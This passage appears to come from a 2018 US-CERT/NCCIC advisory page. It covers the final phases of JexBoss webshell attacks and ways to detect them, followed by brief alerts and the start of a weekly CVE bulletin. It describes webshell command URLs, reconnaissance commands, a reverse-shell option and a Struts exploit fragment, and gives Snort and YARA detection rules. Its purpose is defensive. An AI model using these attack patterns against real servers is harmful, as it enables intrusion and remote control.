    Packet number 22 in figure 13 indicates the test for successful webshell installation. Packet number 24, the HTTP response to packet number 22, is an HTTP 200 OK message that indicates the webshell installation was successful. An HTTP 404 Not Found message in response indicates that the webshell installation failed.

    A screenshot showing the the JexBoss webshell access packet list

    Figure 13: JexBoss webshell access packet list

    Phase 3: C2 and Actions on Objectives

    If JexBoss succeeds in installing the JexBoss webshell on the victim web server, the webshell will allow the attacker to issue OS commands for execution through HTTP GET requests as follows:

    hxxp[:]//victim/jexws4/jexws4.jsp?ppp=<url-encoded-OS-command>

    For example, the packet contents displayed in figure 14 show that the attacker issued the id OS command to the webshell. In figure 14, the victim web server provided the OS command execution output in the HTTP response.

    A screenshot of the HTTP contents of the JexBoss webshell command

    Figure 14: JexBoss webshell command HTTP contents

    When JexBoss is run in standalone mode, JexBoss will issue three specific commands?after the successful installation of the webshell?sequentially upon initial exploitation of a Linux server. These commands are listed in table 2.

    Table 2: JexBoss' default initial Linux commands

    CommandDescription of Action
    uname -aRetrieves host information
    cat /etc/issueRetrieves Linux OS information
    idDetermines the user under which commands will run

    Security analysts can observe the attempted execution of these three commands in web server logs, even if the HTTP communication is encrypted with Transport Layer Security or Secure Sockets Layer. Analyzing web server logs for this activity is an additional way organizations can confirm the presence of JexBoss.

    For vulnerabilities exploited through blind command injection, there is no installation step. JexBoss achieves the Cyber Kill Chain steps C2 and Actions on Objectives (i.e., Phase 3 in the Attack Phases section) by packaging OS commands directly in the exploit payload and delivering the payload to the vulnerable component; therefore, there is no distinction between Phase 2 and Phase 3 in blind command injection.

    The partial packet hexdump shown in figure 15 is an example of the C2 step with blind command injection. In this example, JexBoss packages and delivers an OS command that attempts to establish a reverse shell, described in the Reverse Shell section.

    A screenshot of a JexBoss packet hexdump that includes a reverse shell OS command

    Figure 15: KexBoss packet hexdump including reverse shell OS command

    While a reverse webshell can help attackers achieve C2, it is also easy to detect. An organization?s network web servers do not typically make outbound connections to arbitrary internet hosts; therefore, connections like these would be a red flag for network defenders. In the network capture shown in figure 16, the victim server has established a connection back to the attacker?s system via TCP port 4444.

    A screenshot showing the JexBoss reverse webshell establishment packet list

    Figure 16: JexBoss reverse webshell establishment packet list

    An unusual outbound connection?like the one illustrated in figure 16?would stand out to an experienced network defender; the network defender?s awareness of the anomalous behavior increases the attacker?s risk of detection. Many organizations choose to filter outbound connections, which would stop an attempt like the one illustrated in figure 16.

    Attackers can execute JexBoss commands without a webshell or reverse webshell by using the --cmd option, as described in the Blind Command Injection section. A clever attacker could issue commands to perform complex tasks and exfiltrate data. For example, the attacker may create a script that collects data and sends it to another location on the victim network for later retrieval.

    Webshell Analysis

    If the JexBoss webshell is installed on the victim web server, JexBoss can access the webshell by issuing HTTP GET requests to the appropriate .jsp file (e.g., jexws4/jexws4.jsp), using the optional ppp query parameter, the value of which is used as the OS command to execute on the victim web server.


    There are three main versions of the JexBoss webshell: the original version (November 30, 2014), version 2 (April 23, 2016), and version 4 (the current version). Each time a subsequent JexBoss version is created, the new version can be considered an upgrade over the previous version and offering additional capabilities, as described in table 3.

    Table 3: JexBoss webshell functionality by version

    Webshell VersionFunctionality
    Original (November 30, 2014)
    • Executes OS commands specified in the ppp HTTP query parameter using Java?s Runtime.exec() method and returns the output of the command execution in the HTTP response
    • Requires the User-Agent: jexboss HTTP header
    Version 2 (April 23, 2016)
    • Checks the webshell version if the check-updates HTTP header value is not set to false (see the Version Checks section)
    • Does not require the User-Agent: jexboss HTTP header
    • Executes OS command using Java?s Runtime.exec() method
      • Uses cmd.exe /C for Windows OSs
      • Uses /bin/bash -c for non-Windows OSs
    Version 4 (Current)
    • If the ppp HTTP query parameter is not specified, checks for the X-JEX HTTP header and, if present, uses the value of that header as the OS command
    • If the OS command is in the format jexremote=IP:PORT, establishes a reverse shell (using cmd.exe or /bin/bash, depending upon the web server OS) with the specified IP address and port using Java?s Socket class

    JexBoss webshell version 2 is the latest version available on GitHub, as described in the Version Checks section. This version check uses a User-Agent HTTP header value that includes information about the attacker?s webshell access: the host HTTP header value and the IP address of the attacker host. This collection of host and IP information indicates that JexBoss? author may leverage attackers? use of the tool to collect a list of attacking IPs and exploited servers.

    The latest version of the webshell available on joaomatosf[.]com is version 4. At the time of this report?s publication, NCCIC has been unable to acquire version 3 for analysis.

    Solution

    NCCIC recommends a defense-in-depth approach to mitigating the risks of JexBoss.

    Best Practices

    The best way to defend against JexBoss is to ensure that servers are not vulnerable to the exploits it uses. The vulnerabilities exploited by JexBoss can also be exploited by other tools. Once an organization has remediated the vulnerabilities associated with JexBoss, the organization?s servers will be less prone to other tools that leverage the same exploits.

    Best practices include

    • Keeping OSs, web servers, and applications up-to-date;
    • Securing access to administrative consoles;
    • Using non-privileged accounts with limited capabilities to run servers;
    • Reviewing server logs to identify indications of a successful compromise; and
    • Frequently testing organization systems and applications for the latest vulnerabilities via automated vulnerability scans.

    Because JBoss AS is no longer supported by the vendor, organizations using JBoss AS should migrate their existing JBoss AS instances to the supported equivalent, such as WildFly or the JBoss Enterprise Application Platform. Because JexBoss can be used to exploit a variety of other Java-based frameworks (e.g., Apache Struts, Java Server Faces, Jenkins), users should keep these frameworks updated, or remove them if they are not necessary.

    Detection Strategies

    An organization?s security operations team can monitor for attempted and successful JexBoss exploit attacks using a variety of methods. NCCIC recommends the following detection strategies:

    • Update network IDS and IPS signatures.
    • Analyze behavioral indicators.
    • Analyze on-server artifacts.
    Network IDS and IPS Signatures

    Many organizations deploy Snort or Suricata IDSs in commercial appliances?or as standalone platforms on commodity hardware?and leverage signatures written by Snort, Emerging Threats, and others in the cybersecurity community. Tables 4 and 5 provide signatures developed by NCCIC and other organizations. Signatures that were created by outside organizations reference the appropriate signature identifier.

    NCCIC assesses the Snort rules in table 4 to be high-confidence indicators of potentially dangerous JexBoss webshell network behavior.

    Table 4: JexBoss webshell Snort signatures/rules

    #JexBoss BehaviorDetection Signature/Rule
    1Attempts to issue a command to the JexBoss webshell with the ppp query parameteralert tcp $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"JexBoss webshell command ppp submission"; flow:established,to_server; content:".jsp?ppp="; http_uri; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)
    2Attempts to issue a command to the JexBoss webshell with the X-JEX HTTP header fieldalert tcp $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"JexBoss webshell command X-JEX submission"; flow:established,to_server; content:"X-JEX"; http_header; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)
    3Attempts by the successfully exploited server to download the JexBoss webshell from the internetalert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"JexBoss webshell download"; flow:established,to_server; content:"rnp/jexws4.war"; http_uri; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)
    4CDNS queries for the JexBoss webshell version check and alternate download locationalert udp $HOME_NET any -> any 53 (msg:"DNS query for JexBoss alternate domain"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|08|webshell|07|jexboss|03|net|00|"; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)

    When run against real-world network traffic, NCCIC generated alerts for rule 1 in table 4 above. The URI pattern for these alerts was /jexinv4/jexinv4.jsp?ppp=<cmd>, where <cmd> was a long Linux command that tried to induce the server to download and execute a Linux webshell script from an internet location. This attempt to access the JexBoss webshell was one of several unrelated HTTP requests from the same source IP to the same target IP, likely indicating scanning activity to determine if the server was already compromised by any of a number of tools, including JexBoss.

    As noted in the Attacker to Victim Network Behavior section, an HTTP 200 OK message response from the server would indicate that the webshell was installed on the server. However, the response observed in the NCCIC environment was an HTTP 302 Redirect message, which instructed the client to repeat the request of HTTPS. NCCIC did not observe any such HTTPS traffic. Most likely the presumed scanning tool used to generate the HTTP traffic was not able to properly handle the HTTP 302 response.

    Table 5 provides the Snort rules that indicate JexBoss activity but do not necessarily indicate successful JexBoss exploitation. Rule 5 in table 5 below, alerts on traffic to the JexBoss author?s domain, which?in addition to JexBoss webshells?contains non-JexBoss content.

    Table 5: Snort signatures identifying JexBoss attempts

    #Network ActivityDetection Signature
    1DNS queries for the JexBoss author?s domainalert udp $HOME_NET any -> any 53 (msg:"DNS query for JexBoss author domain joaomatosf.com"; flow:to_server; byte_test:1,!&,0xF8,2; content:"|0A|joaomatosf|03|com|00|"; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)
    2Detects the JexBoss-specific probe of the Apache Struts 2 vulnerability (CVE-2017-5638)alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS any (msg: "JexBoss Apache Struts 2 Probe or exploit"; flow:established,to_server; content: "GET"; http_method; content: "(#giftarray=(#isnix?{'/bin/bash','-c',#gift}:{'cmd.exe','/c',#gift}))"; fast_pattern; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid: X; rev:1;)
    3The HTTP User-Agent header value specific to JexBoss (for the deprecated version 1 of the webshell)alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:" JexBoss User-Agent"; flow:established,to_server; content: ?GET?; http_method; content:"jexboss"; http_user_agent; fast_pattern:only; classtype:trojan-activity; reference:url,github.com/joaomatosf/jexboss; sid:X; rev:1;)
    Behavior Analysis of Network Activity

    The Snort signatures described in the Network IDS and IPS Signatures section may allow organizations to detect some JexBoss attacks. However, attackers attempting to use stealthier techniques may be able to tune their attacks to avoid detection from these signatures.

    By analyzing the behavior surrounding the attack, either manually or by using automated tools, network defenders may be able to determine whether an attack has succeeded. NCCIC?s recommended analysis methods include searching for the following:

    • Unusual outbound connection attempts from the server
      • Unusual outbound connection attempts may indicate an attacker attempting to initiate a reverse webshell or exfiltrate data.
    • Unusual internet downloads from the server
      • Unusual internet downloads may indicate that an attacker is attempting to obtain tools to perform additional attacks (e.g., Mimikatz, SQLMap).
    • Unusual URIs being served by the webserver
      • The presence of unusual URIs may indicate the installation of a webshell, as is the case when jexws4/jexws4.jsp is used.
    • Embedded OS commands
      • Network defenders should specifically search for OS commands embedded in HTTP query parameters, HTTP header values, and HTTP POST data in the contents of the organization?s network traffic. For example, the command in the Apache Struts 2 exploit is visible in the cleartext in the Content-Type header. NCCIC recommends organizations analyze their server to identify evidence that OS commands like these have been executed, the presence of which indicates a successful attack.

    Combining the automated analysis of signatures and behavioral indicators may significantly improve false-positive rates and time-to-detection.

    On-Server Artifacts

    The JexBoss webshell files included on the JexBoss GitHub page?and available on the joaomatosf[.]com website?are Web Application aRchive (WAR) format files, with the file extension .war. These WAR files are basically ZIP files containing the file jexws.jsp, which is the file in the URI that JexBoss requests in order to perform command execution. The JexBoss webshell .war and .jsp file names may start with jexsw2, jexws3, jexws4, or jbossass.

    Tables 6, 7, and 8 include filenames and their associated MD5 checksums for the files related to the JexBoss webshell. Network defenders should search for these files on their organization?s web server file systems, the presence of which indicates a JexBoss webshell.

    The webshell files provided on the JexBoss GitHub page are identified in table 6.

    Table 6: JexBoss webshells on GitHub

    FilenameWebshell VersionSize (bytes)MD5 Checksum
    jbossass.war1685cbdeaf83f58a64b09df58b94063e0146
    jexws.war and jbossas.war212963f156bd68b2a32a1b5cb03af318667f0

    If the target web server is induced to download the .war file from joaomatosf[.]com (see the Webshell Installation section), the web server will retrieve the latest version of the webshell (currently version 4). NCCIC?s examination of the public files hosted on joaomatosf[.]com revealed the presence of the .war files listed in table 7.

    Table 7: JexBoss webshells listed on joaomatosf[.]com

    FilenameWebshell VersionSize (bytes)MD5 Checksum
    jbossass.war414528db88d5d46aa503a697a6940aa10a574
    jexws.war41446bb8d176207045ff70470c511271f56d9
    jexws2.war4144813062a85ed1f5c3f4878ff3950a8e222
    jexws3.war41448f2af83ed4cac1d2c68f82bd8450c7428
    jexws4.war41448a15bf7dd4169069c70ba2f4ee1c62b03

    The .jsp files within the .war files in tables 6 and 7 are listed in table 8.

    Table 8: JexBoss .jsp files

    FilenameWebshell VersionSize (bytes)MD5 Checksum
    jbossass.jsp13783cd75a261debd9fb2b16368266fba778
    jexws.jsp21812e7d94e998f1ec8beb8f33e56607c45f9
    jexws.jsp42201acda46759d7c3526df2a6c59803586a4

    Once the .war file is successfully uploaded to the victim web server, JBoss handles the file as if it is a legitimate web application. In the test environment, NCCIC found the original .war and the unzipped .jsp files in a temporary location (/opt/jboss-6.1.0.Final/server/default/tmp), while the contents of the .jsp file were wrapped in a platform-specific class and written to a new file. The contents of the .jsp file were then installed by JBoss in the following location:

    /opt/jboss-6.1.0.Final/server/default/work/jboss.web/localhost/jexws4/org/apache/jsp/jexws4_jsp.java

    Advanced users of JexBoss can change the names of the webshell files, make minor modifications so that the MD5 checksum differs from those listed in this report, or completely change this webshell to circumvent the methods of detection that focus on the presence of the specific files listed in this report. However, network defenders may still benefit from frequently reviewing web servers for the presence of unwanted files and URIs served by their web server, which may indicate the presence of a webshell or other malware.

    Network defenders should carefully examine their organization?s web server logs for indications of malicious web requests, specifically to identify requests that contain OS commands, such as

    • /bin/bash or uname -a in Linux, or
    • cmd.exe or net commands in Windows.

    Forensic analysts can use the YARA rules provided in figure 17 to search their web server file system for the presence of JexBoss webshell files. These general YARA rules may work better than file hashes to alert on webshell files that attackers have made small changes to in order to evade detection. These general YARA rules will not detect other custom webshells or heavily modified JexBoss webshells.

    rule jexboss_war: webshell
    {
        meta:
            description = "JexBoss WAR File"
        strings:
            $magic = { 50 4b 03 04 ( 14 | 0a ) 00 }
            $string_1 = "jexws"
            $string_2 = "jbossass"
            $jsp_ext = ".jsp"
        condition:
            $magic at 0 and 1 of ($string_*) and $jsp_ext
    }
    rule jexboss_jsp: webshell
    {
        meta:
            description = "JexBoss JSP file"
        strings:
            $string_1 = "getParameter(\"ppp\")"
            $string_2 = "jexboss" nocase
            $string_3 = "getRuntime().exec("
        condition:
            all of ($string_*)
    }

    Figure 17: JexBoss webshell YARA rules

    References

    Revisions

    • November 8, 2018: Initial version

    This product is provided subject to this Notification and this Privacy & Use policy.


  • Original release date: November 07, 2018

    Cisco has released security updates to address vulnerabilities affecting Cisco products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

    NCCIC encourages users and administrators to review the following Cisco Security Advisories and apply the necessary updates:


    This product is provided subject to this Notification and this Privacy & Use policy.


  • Original release date: November 06, 2018

    NCCIC is aware of reports of vulnerabilities in the hardware encryption of certain self-encrypting solid-state drives. An attacker could exploit these vulnerabilities to obtain access to sensitive information.

    NCCIC encourages users and administrators to review Vulnerability Note VU# 395981, Microsoft's Security Advisory ADV180028, and Samsung's Customer Notice regarding Samsung SSDs for more information and refer to vendors for appropriate patches and recommendations, when available.


    This product is provided subject to this Notification and this Privacy & Use policy.


  • Original release date: November 05, 2018

    The Apache Software Foundation has released an advisory to address a vulnerable commons-fileupload library used in Apache Struts versions 2.3.36 and prior. A remote attacker could exploit this vulnerability to take control of an affected system. Struts versions from 2.5.12 are not affected.

    NCCIC encourages users and administrators of Apache Struts versions 2.3.36 and prior to review the Apache security advisory for CVE-2016-1000031 and upgrade to the latest released version of Commons FileUpload library, which is currently 1.3.3.


    This product is provided subject to this Notification and this Privacy & Use policy.


  • Original release date: November 05, 2018

    The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

    The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

    • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

    • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

    • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

    Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

    The NCCIC Weekly Vulnerability Summary Bulletin is created using information from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

     

    High Vulnerabilities

    Primary
    Vendor -- Product
    DescriptionPublishedCVSS ScoreSource & Patch Info
    There were no high vulnerabilities recorded this week.
    Back to top

     

    Medium Vulnerabilities

    Primary
    Vendor -- Product
    DescriptionPublishedCVSS ScoreSource & Patch Info
    There were no medium vulnerabilities recorded this week.
    Back to top

     

    Low Vulnerabilities

    Primary
    Vendor -- Product
    DescriptionPublishedCVSS ScoreSource & Patch Info
    There were no low vulnerabilities recorded this week.
    Back to top

     

    Severity Not Yet Assigned

    Primary
    Vendor -- Product
    DescriptionPublishedCVSS ScoreSource & Patch Info
    acme_labs -- mini_httpd
     
    ACME mini_httpd before 1.30 lets remote users read arbitrary files.2018-10-29not yet calculatedCVE-2018-18778
    MISC
    advantech -- webaccessWADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to read any file on the filesystem due to a directory traversal vulnerability in the readFile API.2018-10-31not yet calculatedCVE-2018-15706
    MISC
    advantech -- webaccessWebAccess Versions 8.3.2 and prior. The application fails to properly validate the length of user-supplied data, causing a buffer overflow condition that allows for arbitrary remote code execution.2018-10-29not yet calculatedCVE-2018-17910
    BID
    SECTRACK
    MISC
    advantech -- webaccessAdvantech WebAccess 8.3.1 and 8.3.2 are vulnerable to cross-site scripting in the Bwmainleft.asp page. An attacker could leverage this vulnerability to disclose credentials amongst other things.2018-10-31not yet calculatedCVE-2018-15707
    MISC
    advantech -- webaccess
     
    WebAccess Versions 8.3.2 and prior. During installation, the application installer disables user access control and does not re-enable it after the installation is complete. This could allow an attacker to run elevated arbitrary code.2018-10-29not yet calculatedCVE-2018-17908
    BID
    SECTRACK
    MISC
    advantech -- webaccess
     
    WADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to write or overwrite any file on the filesystem due to a directory traversal vulnerability in the writeFile API. An attacker can use this vulnerability to remotely execute arbitrary code.2018-10-31not yet calculatedCVE-2018-15705
    MISC
    apache -- web_server
     
    The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical.2018-10-31not yet calculatedCVE-2018-11759
    MISC
    apex-publish-static-files -- apex-publish-static-filesA command injection vulnerability in the apex-publish-static-files npm module version <2.0.1 which allows arbitrary shell command execution through a maliciously crafted argument.2018-10-30not yet calculatedCVE-2018-16462
    MISC
    artifex -- mupdf
     
    There is an out-of-bounds read in fz_run_t3_glyph in fitz/font.c in Artifex MuPDF 1.14.0, as demonstrated by mutool.2018-10-26not yet calculatedCVE-2018-18662
    BID
    MISC
    MISC
    asrock -- driversThe AsrDrv101.sys and AsrDrv102.sys low-level drivers in ASRock RGBLED before v1.0.35.1, A-Tuning before v3.0.210, F-Stream before v3.0.210, and RestartToUEFI before v1.0.6.2 expose functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code.2018-10-30not yet calculatedCVE-2018-10711
    EXPLOIT-DB
    MISC
    asrock -- driversThe AsrDrv101.sys and AsrDrv102.sys low-level drivers in ASRock RGBLED before v1.0.35.1, A-Tuning before v3.0.210, F-Stream before v3.0.210, and RestartToUEFI before v1.0.6.2 expose functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges.2018-10-30not yet calculatedCVE-2018-10712
    EXPLOIT-DB
    MISC
    asrock -- driversThe AsrDrv101.sys and AsrDrv102.sys low-level drivers in ASRock RGBLED before v1.0.35.1, A-Tuning before v3.0.210, F-Stream before v3.0.210, and RestartToUEFI before v1.0.6.2 expose functionality to read and write CR register values. This could be leveraged in a number of ways to ultimately run code with elevated privileges.2018-10-30not yet calculatedCVE-2018-10709
    EXPLOIT-DB
    MISC
    asrock -- driversThe AsrDrv101.sys and AsrDrv102.sys low-level drivers in ASRock RGBLED before v1.0.35.1, A-Tuning before v3.0.210, F-Stream before v3.0.210, and RestartToUEFI before v1.0.6.2 expose functionality to read and write arbitrary physical memory. This could be leveraged by a local attacker to elevate privileges.2018-10-30not yet calculatedCVE-2018-10710
    EXPLOIT-DB
    MISC
    bitdefender -- gravityzone_vmware
     
    Bitdefender GravityZone VMware appliance before 6.2.1-35 might allow attackers to gain access with root privileges via unspecified vectors.2018-10-30not yet calculatedCVE-2017-8931
    CONFIRM
    catfish -- cmsA CSRF issue was discovered in admin/Index/tiquan in catfish blog 2.0.33.2018-10-29not yet calculatedCVE-2018-18735
    MISC
    catfish -- cmsAn XSS issue was discovered in catfish blog 2.0.33, related to "write source code."2018-10-29not yet calculatedCVE-2018-18736
    MISC
    catfish -- cmsA CSRF issue was discovered in admin/Index/addmanageuser.html in Catfish CMS 4.8.30.2018-10-29not yet calculatedCVE-2018-18734
    MISC
    catfish -- cms
     
    An XSS issue was discovered in Catfish CMS 4.8.30, related to "write source code," a similar issue to CVE-2018-13999.2018-10-29not yet calculatedCVE-2018-18733
    MISC
    cesanta -- mongooseAn exploitable arbitrary memory read vulnerability exists in the MQTT packet-parsing functionality of Cesanta Mongoose 6.13. It is a heap-based buffer over-read in mg_mqtt_next_subscribe_topic. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of-bounds memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.2018-10-29not yet calculatedCVE-2018-18765
    MISC
    cesanta -- mongooseAn exploitable arbitrary memory read vulnerability exists in the MQTT packet-parsing functionality of Cesanta Mongoose 6.13. It is a heap-based buffer over-read in a parse_mqtt getu16 call. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of-bounds memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.2018-10-29not yet calculatedCVE-2018-18764
    MISC
    MISC
    circontrol -- circarlifeCircontrol CirCarLife all versions prior to 4.3.1, the PAP credentials of the device are stored in clear text in a log file that is accessible without authentication.2018-11-02not yet calculatedCVE-2018-17922
    MISC
    circontrol -- circarlife
     
    Circontrol CirCarLife all versions prior to 4.3.1, authentication to the device can be bypassed by entering the URL of a specific page.2018-11-02not yet calculatedCVE-2018-17918
    MISC
    cisco -- adaptive_security_appliance_and_firepower_threat_defense_softwareA vulnerability in the Session Initiation Protocol (SIP) inspection engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload or trigger high CPU, resulting in a denial of service (DoS) condition. The vulnerability is due to improper handling of SIP traffic. An attacker could exploit this vulnerability by sending SIP requests designed to specifically trigger this issue at a high rate across an affected device. Software updates that address this vulnerability are not yet available.2018-11-01not yet calculatedCVE-2018-15454
    BID
    CISCO
    clarkgrubb -- data-tools
     
    data-tools through 2017-07-26 has an Integer Overflow leading to an incorrect end value for the write_wchars function.2018-10-29not yet calculatedCVE-2018-18749
    MISC
    curl -- curlCurl versions 7.14.1 through 7.61.1 are vulnerable to a heap-based buffer over-read in the tool_msgs.c:voutf() function that may result in information exposure and denial of service.2018-10-31not yet calculatedCVE-2018-16842
    SECTRACK
    CONFIRM
    MISC
    CONFIRM
    UBUNTU
    UBUNTU
    DEBIAN
    curl -- curlA heap use-after-free flaw was found in curl versions from 7.59.0 through 7.61.1 in the code related to closing an easy handle. When closing and cleaning up an 'easy' handle in the `Curl_close()` function, the library code first frees a struct (without nulling the pointer) and might then subsequently erroneously write to a struct field within that already freed struct.2018-10-31not yet calculatedCVE-2018-16840
    SECTRACK
    CONFIRM
    MISC
    CONFIRM
    UBUNTU
    curl -- curl
     
    Curl versions 7.33.0 through 7.61.1 are vulnerable to a buffer overrun in the SASL authentication code that may lead to denial of service.2018-10-31not yet calculatedCVE-2018-16839
    SECTRACK
    CONFIRM
    MISC
    CONFIRM
    UBUNTU
    DEBIAN
    dedecms -- dedecmsDedeCMS 5.7 SP2 allows XSS via the /member/uploads_select.php f or keyword parameter.2018-10-29not yet calculatedCVE-2018-18781
    MISC
    dedecms -- dedecms
     
    Reflected XSS exists in DedeCMS 5.7 SP2 via the /member/myfriend.php ftype parameter.2018-10-29not yet calculatedCVE-2018-18782
    MISC
    dell_emc -- integrated_data_protection_appliance
     
    Integrated Data Protection Appliance versions 2.0, 2.1, and 2.2 contain undocumented accounts named 'support' and 'admin' that are protected with default passwords. These accounts have limited privileges and can access certain system files only. A malicious user with the knowledge of the default passwords may potentially log in to the system and gain read and write access to certain system files.2018-11-02not yet calculatedCVE-2018-11062
    BID
    FULLDISC
    dkcms -- dkcms
     
    admin/check.asp in DKCMS 9.4 allows SQL Injection via an ASPSESSIONID cookie to admin/admin.asp.2018-10-30not yet calculatedCVE-2018-18832
    MISC
    MISC
    doccms_2016 -- doccms_2016
     
    upload_template() in system/changeskin.php in DocCms 2016.5.12 allows remote attackers to execute arbitrary PHP code via a template file.2018-10-30not yet calculatedCVE-2018-18835
    MISC
    douchat -- douchat
     
    An XXE issue was discovered in Douchat 4.0.4 because Data\notify.php calls simplexml_load_string. This can also be used for SSRF.2018-10-29not yet calculatedCVE-2018-18737
    MISC
    ee -- 4gee_hh70_router
     
    An issue was discovered on EE 4GEE HH70VB-2BE8GB3 HH70_E1_02.00_19 devices. Hardcoded root SSH credentials were discovered to be stored within the "core_app" binary utilised by the EE router for networking services. An attacker with knowledge of the default password (oelinux123) could login to the router via SSH as the root user, which could allow for the loss of confidentiality, integrity, and availability of the system. This would also allow for the bypass of the "AP Isolation" mode that is supported by the router, as well as the settings for multiple Wireless networks, which a user may use for guest clients.2018-10-30not yet calculatedCVE-2018-10532
    MISC
    MISC
    eleanor -- cms
     
    An issue was discovered in Eleanor CMS through 2015-03-19. XSS exists via the ajax.php?direct=admin&file=autocomplete&query=[XSS] URI.2018-10-29not yet calculatedCVE-2018-18717
    MISC
    empirecms -- empirecms
     
    EmpireCMS V7.5 allows remote attackers to upload and execute arbitrary code via ..%2F directory traversal in a .php filename in the upload/e/admin/ecmscom.php path parameter.2018-10-31not yet calculatedCVE-2018-18869
    MISC
    exiv2 -- exiv2
     
    There is an infinite loop in the Exiv2::Image::printIFDStructure function of image.cpp in Exiv2 0.27-RC1. A crafted input will lead to a remote denial of service attack.2018-11-03not yet calculatedCVE-2018-18915
    MISC
    f5 -- big-ipOn BIG-IP 14.0.0-14.0.0.2, 13.0.0-13.1.1.1, or 12.1.0-12.1.3.6, malicious requests made to virtual servers with an HTTP profile can cause the TMM to restart. The issue is exposed with the non-default "normalize URI" configuration options used in iRules and/or BIG-IP LTM policies.2018-10-31not yet calculatedCVE-2018-15319
    CONFIRM
    f5 -- big-ipOn BIG-IP 14.0.0-14.0.0.2 or 13.0.0-13.1.1.1, in certain circumstances, when processing traffic through a Virtual Server with an associated MQTT profile, the TMM process may produce a core file and take the configured HA action.2018-10-31not yet calculatedCVE-2018-15323
    CONFIRM
    f5 -- big-ipIn BIG-IP 14.0.0-14.0.0.2 or 13.0.0-13.1.1.1, iControl and TMSH usage by authenticated users may leak a small amount of memory when executing commands2018-10-31not yet calculatedCVE-2018-15325
    CONFIRM
    f5 -- big-ipOn BIG-IP 14.0.0-14.0.0.2 or 13.0.0-13.1.1.1, undisclosed traffic patterns may lead to denial of service conditions for the BIG-IP system. The configuration which exposes this condition is the BIG-IP self IP address which is part of a VLAN group and has the Port Lockdown setting configured with anything other than "allow-all".2018-10-31not yet calculatedCVE-2018-15320
    CONFIRM
    f5 -- big-ipIn BIG-IP 14.0.0-14.0.0.2, 13.1.0.4-13.1.1.1, or 12.1.3.4-12.1.3.6, if an MPTCP connection receives a HUDCTL_ABORT while the initial flow is not the primary flow, the initial flow will remain after the MP_FASTCLOSE procedure is complete. TMM may restart and produce a core file as a result of this condition.2018-10-31not yet calculatedCVE-2018-15318
    CONFIRM
    f5 -- big-ip_and_enterprise_managerIn BIG-IP 14.0.0-14.0.0.2 or 13.0.0-13.1.1.1 or Enterprise Manager 3.1.1, when authenticated administrative users run commands in the Traffic Management User Interface (TMUI), also referred to as the BIG-IP Configuration utility, restrictions on allowed commands may not be enforced.2018-10-31not yet calculatedCVE-2018-15327
    CONFIRM
    f5 -- big-ip_apmOn BIG-IP APM 14.0.0-14.0.0.2 or 13.0.0-13.1.1.1, TMM may restart when processing a specially crafted request with APM portal access.2018-10-31not yet calculatedCVE-2018-15324
    CONFIRM
    f5 -- big-ip_apmIn some situations on BIG-IP APM 14.0.0-14.0.0.2, 13.0.0-13.1.0.7, 12.1.0-12.1.3.5, or 11.6.0-11.6.3.2, the CRLDP Auth access policy agent may treat revoked certificates as valid when the BIG-IP APM system fails to download a new Certificate Revocation List.2018-10-31not yet calculatedCVE-2018-15326
    CONFIRM
    f5 -- big-ip
     
